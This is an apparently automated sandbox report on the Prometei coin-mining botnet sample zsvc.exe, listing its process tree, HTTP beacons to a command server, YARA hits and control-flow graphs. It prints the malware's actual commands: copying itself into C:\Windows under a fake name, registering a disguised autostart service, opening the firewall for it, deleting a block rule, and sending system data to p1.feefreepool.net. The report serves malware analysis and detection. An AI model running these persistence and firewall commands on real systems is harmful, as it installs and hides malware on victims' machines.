            Date: Tue, 23 Mar 2021 13:08:06 GMT
            Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
            Content-Length: 7
            Connection: close
            Content-Type: text/html; charset=windows-1251
            Data Raw: 73 79 73 69 6e 66 6f
            Data Ascii: sysinfo


            Session IDSource IPSource PortDestination IPDestination PortProcess
            1192.168.2.34971488.198.246.24280C:\Windows\sqhost.exe
            TimestampkBytes transferredDirectionData
            Mar 23, 2021 14:08:09.731378078 CET1164OUTGET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJbnRlbChSKSBDb3JlKFRNKTIgQ1BVIDY2MDAgQCAyLjQwIEdIeg0KDQoNClNGMURFUzlLQVMNCk5TT3V3IE9mDQoNCjEwLjAuMTcxMzQuMQ0KDQoNCjIwMjAwOTMwMDgwMjI5LjQ5MzE3Ny00MjANCk1pY3Jvc29mdCBXaW5kb3dzIDEwIFBybw0KfQ0K&h=computer&i=90Z405GXDA2Q5271&enckey=BtO0tzJv2apOB7qyzIW7zWStGW/UHBc4Xxf1Kg/hg-0ejQgNvvOI-nwRaXMjLhcvacc8U4MXZ7rGYP3FggtsNhWMcIqYeNGD/JknHi-IV66WOa6UuMMRKvZg2a3fLLQAOxVELNFmUML3ZKJUE7iUbF/IJ7fzTHFAPCETqP4WJyQ_ HTTP/1.0
            Host: p1.feefreepool.net
            Mar 23, 2021 14:08:22.899101973 CET1294INHTTP/1.1 200 OK
            Date: Tue, 23 Mar 2021 13:08:24 GMT
            Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g PHP/5.2.6
            Content-Length: 2
            Connection: close
            Content-Type: text/html; charset=windows-1251
            Data Raw: 6f 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 0a 0a
            Data Ascii: okContent-type: text/html; charset=windows-1251


            Code Manipulations

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Start time:14:07:47
            Start date:23/03/2021
            Path:C:\Windows\System32\svchost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
            Imagebase:0x7ff7488e0000
            File size:51288 bytes
            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:14:07:47
            Start date:23/03/2021
            Path:C:\Users\user\Desktop\zsvc.exe
            Wow64 process (32bit):false
            Commandline:'C:\Users\user\Desktop\zsvc.exe'
            Imagebase:0x140000000
            File size:152576 bytes
            MD5 hash:84452E3633C40030E72C9375C8A3CACB
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_CoinMiner, Description: Yara detected CoinMiner, Source: 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Prometei, Description: Yara detected Prometei, Source: 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:14:07:48
            Start date:23/03/2021
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\cmd.exe' /C copy /y 'c:\users\user\desktop\zsvc.exe' C:\windows
            Imagebase:0x7ff77d8b0000
            File size:273920 bytes
            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:14:07:48
            Start date:23/03/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6b2800000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:14:07:48
            Start date:23/03/2021
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:cmd.exe /c sc query UPlugPlay
            Imagebase:0x7ff77d8b0000
            File size:273920 bytes
            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:14:07:49
            Start date:23/03/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6b2800000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:14:07:49
            Start date:23/03/2021
            Path:C:\Windows\System32\sc.exe
            Wow64 process (32bit):false
            Commandline:sc query UPlugPlay
            Imagebase:0x7ff73e020000
            File size:69120 bytes
            MD5 hash:D79784553A9410D15E04766AAAB77CD6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            General

            Start time:14:07:50
            Start date:23/03/2021
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE
            Imagebase:0x7ff77d8b0000
            File size:273920 bytes
            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:14:07:50
            Start date:23/03/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6b2800000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:14:07:50
            Start date:23/03/2021
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\cmd.exe' /C sc delete UPlugPlay&sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore
            Imagebase:0x7ff77d8b0000
            File size:273920 bytes
            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:14:07:50
            Start date:23/03/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6b2800000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:14:07:50
            Start date:23/03/2021
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\cmd.exe' /C reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'
            Imagebase:0x7ff77d8b0000
            File size:273920 bytes
            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:14:07:51
            Start date:23/03/2021
            Path:C:\Windows\System32\netsh.exe
            Wow64 process (32bit):false
            Commandline:netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes
            Imagebase:0x7ff6e2710000
            File size:92672 bytes
            MD5 hash:98CC37BBF363A38834253E22C80A8F32
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate

            General

            Start time:14:07:51
            Start date:23/03/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6b2800000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:14:07:51
            Start date:23/03/2021
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\cmd.exe' /C sc config UPlugPlay start= auto
            Imagebase:0x7ff77d8b0000
            File size:273920 bytes
            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Start time:14:07:51
            Start date:23/03/2021
            Path:C:\Windows\System32\sc.exe
            Wow64 process (32bit):false
            Commandline:sc delete UPlugPlay
            Imagebase:0x7ff73e020000
            File size:69120 bytes
            MD5 hash:D79784553A9410D15E04766AAAB77CD6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:51
            Start date:23/03/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6b2800000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:51
            Start date:23/03/2021
            Path:C:\Windows\System32\netsh.exe
            Wow64 process (32bit):false
            Commandline:netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE
            Imagebase:0x7ff6e2710000
            File size:92672 bytes
            MD5 hash:98CC37BBF363A38834253E22C80A8F32
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:51
            Start date:23/03/2021
            Path:C:\Windows\System32\reg.exe
            Wow64 process (32bit):false
            Commandline:reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'
            Imagebase:0x7ff6dad40000
            File size:72704 bytes
            MD5 hash:E3DACF0B31841FA02064B4457D44B357
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:52
            Start date:23/03/2021
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\cmd.exe' /C ren C:\windows\zsvc.exe sqhost.exe
            Imagebase:0x7ff77d8b0000
            File size:273920 bytes
            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:52
            Start date:23/03/2021
            Path:C:\Windows\System32\sc.exe
            Wow64 process (32bit):false
            Commandline:sc config UPlugPlay start= auto
            Imagebase:0x7ff73e020000
            File size:69120 bytes
            MD5 hash:D79784553A9410D15E04766AAAB77CD6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:52
            Start date:23/03/2021
            Path:C:\Windows\System32\sc.exe
            Wow64 process (32bit):false
            Commandline:sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore
            Imagebase:0x7ff73e020000
            File size:69120 bytes
            MD5 hash:D79784553A9410D15E04766AAAB77CD6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:52
            Start date:23/03/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6b2800000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:53
            Start date:23/03/2021
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay
            Imagebase:0x7ff77d8b0000
            File size:273920 bytes
            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:53
            Start date:23/03/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6b2800000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:53
            Start date:23/03/2021
            Path:C:\Windows\System32\sc.exe
            Wow64 process (32bit):false
            Commandline:sc start UPlugPlay
            Imagebase:0x7ff73e020000
            File size:69120 bytes
            MD5 hash:D79784553A9410D15E04766AAAB77CD6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:54
            Start date:23/03/2021
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay
            Imagebase:0x7ff77d8b0000
            File size:273920 bytes
            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:54
            Start date:23/03/2021
            Path:C:\Windows\sqhost.exe
            Wow64 process (32bit):false
            Commandline:c:\windows\sqhost.exe Dcomsvc
            Imagebase:0x140000000
            File size:152576 bytes
            MD5 hash:84452E3633C40030E72C9375C8A3CACB
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_CoinMiner, Description: Yara detected CoinMiner, Source: 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Prometei, Description: Yara detected Prometei, Source: 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp, Author: Joe Security

            General

            Start time:14:07:54
            Start date:23/03/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6b2800000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:54
            Start date:23/03/2021
            Path:C:\Windows\sqhost.exe
            Wow64 process (32bit):false
            Commandline:c:\windows\sqhost.exe -watchdog
            Imagebase:0x140000000
            File size:152576 bytes
            MD5 hash:84452E3633C40030E72C9375C8A3CACB
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_CoinMiner, Description: Yara detected CoinMiner, Source: 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_Prometei, Description: Yara detected Prometei, Source: 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp, Author: Joe Security

            General

            Start time:14:07:54
            Start date:23/03/2021
            Path:C:\Windows\System32\sc.exe
            Wow64 process (32bit):false
            Commandline:sc start UPlugPlay
            Imagebase:0x7ff73e020000
            File size:69120 bytes
            MD5 hash:D79784553A9410D15E04766AAAB77CD6
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:55
            Start date:23/03/2021
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall delete rule name='Banned brute IPs'
            Imagebase:0x7ff77d8b0000
            File size:273920 bytes
            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:55
            Start date:23/03/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6b2800000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:55
            Start date:23/03/2021
            Path:C:\Windows\System32\cmd.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\cmd.exe' /C Auditpol /set /subcategory:'Logon' /failure:enable
            Imagebase:0x7ff77d8b0000
            File size:273920 bytes
            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:56
            Start date:23/03/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6b2800000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:56
            Start date:23/03/2021
            Path:C:\Windows\System32\netsh.exe
            Wow64 process (32bit):false
            Commandline:netsh advfirewall firewall delete rule name='Banned brute IPs'
            Imagebase:0x7ff6e2710000
            File size:92672 bytes
            MD5 hash:98CC37BBF363A38834253E22C80A8F32
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:07:56
            Start date:23/03/2021
            Path:C:\Windows\System32\auditpol.exe
            Wow64 process (32bit):false
            Commandline:Auditpol /set /subcategory:'Logon' /failure:enable
            Imagebase:0x7ff6da5b0000
            File size:35328 bytes
            MD5 hash:6AA4D93CA898F6906B065323E2F0839A
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:08:04
            Start date:23/03/2021
            Path:C:\Windows\System32\wbem\WMIC.exe
            Wow64 process (32bit):false
            Commandline:wmic baseboard get product
            Imagebase:0x7ff796210000
            File size:521728 bytes
            MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:08:04
            Start date:23/03/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6b2800000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            General

            Start time:14:08:06
            Start date:23/03/2021
            Path:C:\Windows\System32\wbem\WMIC.exe
            Wow64 process (32bit):false
            Commandline:wmic baseboard get product
            Imagebase:0x7ff796210000
            File size:521728 bytes
            MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            Disassembly

            Code Analysis

            Reset < >

              Execution Graph

              Execution Coverage:49.4%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:88.9%
              Total number of Nodes:9
              Total number of Limit Nodes:1

              Graph

              Callgraph

              • Executed
              • Not Executed
              • Opacity -> Relevance
              • Disassembly available
              callgraph 0 Function_000000014128D5A0 2 Function_000000014128D562 0->2 1 Function_000000014128D530 1->0

              Executed Functions

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 14128d5a0-14128d5a3 1 14128d5ad-14128d5b1 0->1 2 14128d5bd 1->2 3 14128d5b3-14128d5bb 1->3 4 14128d5bf-14128d5c2 2->4 5 14128d5a5-14128d5aa 2->5 3->2 6 14128d5cb-14128d5d2 4->6 5->1 8 14128d5de 6->8 9 14128d5d4-14128d5dc 6->9 10 14128d5e0-14128d5e3 8->10 11 14128d5c4-14128d5c9 8->11 9->8 12 14128d5fe-14128d600 10->12 13 14128d5e5-14128d5f3 10->13 11->6 14 14128d60a 12->14 15 14128d602-14128d608 12->15 17 14128d64d-14128d668 13->17 18 14128d5f5-14128d5fa 13->18 20 14128d634-14128d637 14->20 21 14128d60c-14128d610 14->21 15->14 22 14128d699-14128d69c 17->22 19 14128d5fc 18->19 18->20 19->21 31 14128d639-14128d648 call 14128d562 20->31 23 14128d61a 21->23 24 14128d612-14128d618 21->24 25 14128d69e-14128d69f 22->25 26 14128d6a1-14128d6a7 22->26 23->20 28 14128d61c-14128d623 23->28 24->23 30 14128d680-14128d684 25->30 27 14128d6ae-14128d6b2 26->27 32 14128d70a-14128d75d VirtualProtect * 2 27->32 33 14128d6b4-14128d6cc LoadLibraryA 27->33 45 14128d62d 28->45 46 14128d625-14128d62b 28->46 34 14128d66a-14128d66d 30->34 35 14128d686-14128d689 30->35 31->1 40 14128d762-14128d767 32->40 37 14128d6ce-14128d6d5 33->37 34->26 38 14128d66f 34->38 35->26 41 14128d68b-14128d68f 35->41 37->27 43 14128d6d7 37->43 44 14128d670-14128d674 38->44 40->40 47 14128d769 40->47 41->44 48 14128d691-14128d698 41->48 49 14128d6d9-14128d6e1 43->49 50 14128d6e3-14128d6eb 43->50 44->30 51 14128d676-14128d678 44->51 45->28 52 14128d62f-14128d632 45->52 46->45 48->22 53 14128d6ed-14128d6f9 GetProcAddress 49->53 50->53 51->30 54 14128d67a-14128d67e 51->54 52->31 55 14128d6fb-14128d702 53->55 56 14128d704 ExitProcess 53->56 54->30 54->35 55->37
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.222626531.000000014128D000.00000080.00020000.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000001.00000002.222409832.0000000140000000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp Download File
              • Associated: 00000001.00000002.222466243.000000014004B000.00000040.00020000.sdmp Download File
              • Associated: 00000001.00000002.222538859.0000000140BD1000.00000040.00020000.sdmp Download File
              • Associated: 00000001.00000002.222586327.000000014127F000.00000040.00020000.sdmp Download File
              • Associated: 00000001.00000002.222598642.0000000141281000.00000040.00020000.sdmp Download File
              • Associated: 00000001.00000002.222619197.000000014128C000.00000040.00020000.sdmp Download File
              • Associated: 00000001.00000002.222640909.000000014128E000.00000004.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_140000000_zsvc.jbxd
              Yara matches
              Similarity
              • API ID: ProtectVirtual$AddressLibraryLoadProc
              • String ID:
              • API String ID: 3300690313-0
              • Opcode ID: 224ad11c7606ebcab93525a208355d4f630ab1f4d01cea70e03ccfacad51b071
              • Instruction ID: 2eac8e8e49a5c6f9566bb731fc5f875140e309695ddc069fdeea8b5f34baf3bf
              • Opcode Fuzzy Hash: 224ad11c7606ebcab93525a208355d4f630ab1f4d01cea70e03ccfacad51b071
              • Instruction Fuzzy Hash: 85514832B5117D6AFA245AA4BC84BE8565193053BCF784321EFBDC33E5DAD888DE8210
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Execution Graph

              Execution Coverage:49.4%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:9
              Total number of Limit Nodes:1

              Graph

              Callgraph

              • Executed
              • Not Executed
              • Opacity -> Relevance
              • Disassembly available
              callgraph 0 Function_000000014128D5A0 2 Function_000000014128D562 0->2 1 Function_000000014128D530 1->0

              Executed Functions

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 0 14128d5a0-14128d5a3 1 14128d5ad-14128d5b1 0->1 2 14128d5bd 1->2 3 14128d5b3-14128d5bb 1->3 4 14128d5bf-14128d5c2 2->4 5 14128d5a5-14128d5aa 2->5 3->2 6 14128d5cb-14128d5d2 4->6 5->1 8 14128d5de 6->8 9 14128d5d4-14128d5dc 6->9 10 14128d5e0-14128d5e3 8->10 11 14128d5c4-14128d5c9 8->11 9->8 12 14128d5fe-14128d600 10->12 13 14128d5e5-14128d5f3 10->13 11->6 14 14128d60a 12->14 15 14128d602-14128d608 12->15 17 14128d64d-14128d668 13->17 18 14128d5f5-14128d5fa 13->18 20 14128d634-14128d637 14->20 21 14128d60c-14128d610 14->21 15->14 22 14128d699-14128d69c 17->22 19 14128d5fc 18->19 18->20 19->21 31 14128d639-14128d648 call 14128d562 20->31 23 14128d61a 21->23 24 14128d612-14128d618 21->24 25 14128d69e-14128d69f 22->25 26 14128d6a1-14128d6a7 22->26 23->20 28 14128d61c-14128d623 23->28 24->23 30 14128d680-14128d684 25->30 27 14128d6ae-14128d6b2 26->27 32 14128d70a-14128d75d VirtualProtect * 2 27->32 33 14128d6b4-14128d6cc LoadLibraryA 27->33 45 14128d62d 28->45 46 14128d625-14128d62b 28->46 34 14128d66a-14128d66d 30->34 35 14128d686-14128d689 30->35 31->1 40 14128d762-14128d767 32->40 37 14128d6ce-14128d6d5 33->37 34->26 38 14128d66f 34->38 35->26 41 14128d68b-14128d68f 35->41 37->27 43 14128d6d7 37->43 44 14128d670-14128d674 38->44 40->40 47 14128d769 40->47 41->44 48 14128d691-14128d698 41->48 49 14128d6d9-14128d6e1 43->49 50 14128d6e3-14128d6eb 43->50 44->30 51 14128d676-14128d678 44->51 45->28 52 14128d62f-14128d632 45->52 46->45 48->22 53 14128d6ed-14128d6f9 GetProcAddress 49->53 50->53 51->30 54 14128d67a-14128d67e 51->54 52->31 55 14128d6fb-14128d702 53->55 56 14128d704 ExitProcess 53->56 54->30 54->35 55->37
              APIs
              Memory Dump Source
              • Source File: 0000001B.00000002.469522057.000000014128D000.00000080.00020000.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 0000001B.00000002.469241379.0000000140000000.00000002.00020000.sdmp Download File
              • Associated: 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp Download File
              • Associated: 0000001B.00000002.469295419.000000014004B000.00000040.00020000.sdmp Download File
              • Associated: 0000001B.00000002.469304060.000000014004F000.00000040.00020000.sdmp Download File
              • Associated: 0000001B.00000002.469310313.0000000140057000.00000040.00020000.sdmp Download File
              • Associated: 0000001B.00000002.469350026.0000000140333000.00000040.00020000.sdmp Download File
              • Associated: 0000001B.00000002.469371763.0000000140614000.00000040.00020000.sdmp Download File
              • Associated: 0000001B.00000002.469377551.0000000140618000.00000040.00020000.sdmp Download File
              • Associated: 0000001B.00000002.469413486.00000001408F5000.00000040.00020000.sdmp Download File
              • Associated: 0000001B.00000002.469443981.0000000140BD1000.00000040.00020000.sdmp Download File
              • Associated: 0000001B.00000002.469498767.000000014127F000.00000040.00020000.sdmp Download File
              • Associated: 0000001B.00000002.469505839.0000000141281000.00000040.00020000.sdmp Download File
              • Associated: 0000001B.00000002.469514930.000000014128C000.00000040.00020000.sdmp Download File
              • Associated: 0000001B.00000002.469529903.000000014128E000.00000004.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_27_2_140000000_sqhost.jbxd
              Yara matches
              Similarity
              • API ID: ProtectVirtual$AddressLibraryLoadProc
              • String ID:
              • API String ID: 3300690313-0
              • Opcode ID: 224ad11c7606ebcab93525a208355d4f630ab1f4d01cea70e03ccfacad51b071
              • Instruction ID: 2eac8e8e49a5c6f9566bb731fc5f875140e309695ddc069fdeea8b5f34baf3bf
              • Opcode Fuzzy Hash: 224ad11c7606ebcab93525a208355d4f630ab1f4d01cea70e03ccfacad51b071
              • Instruction Fuzzy Hash: 85514832B5117D6AFA245AA4BC84BE8565193053BCF784321EFBDC33E5DAD888DE8210
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Execution Graph

              Execution Coverage:49.4%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:9
              Total number of Limit Nodes:1

              Graph

              Callgraph

              • Executed
              • Not Executed
              • Opacity -> Relevance
              • Disassembly available
              callgraph 0 Function_000000014128D5A0 2 Function_000000014128D562 0->2 1 Function_000000014128D530 1->0

              Executed Functions

              Control-flow Graph

              • Executed
              • Not Executed
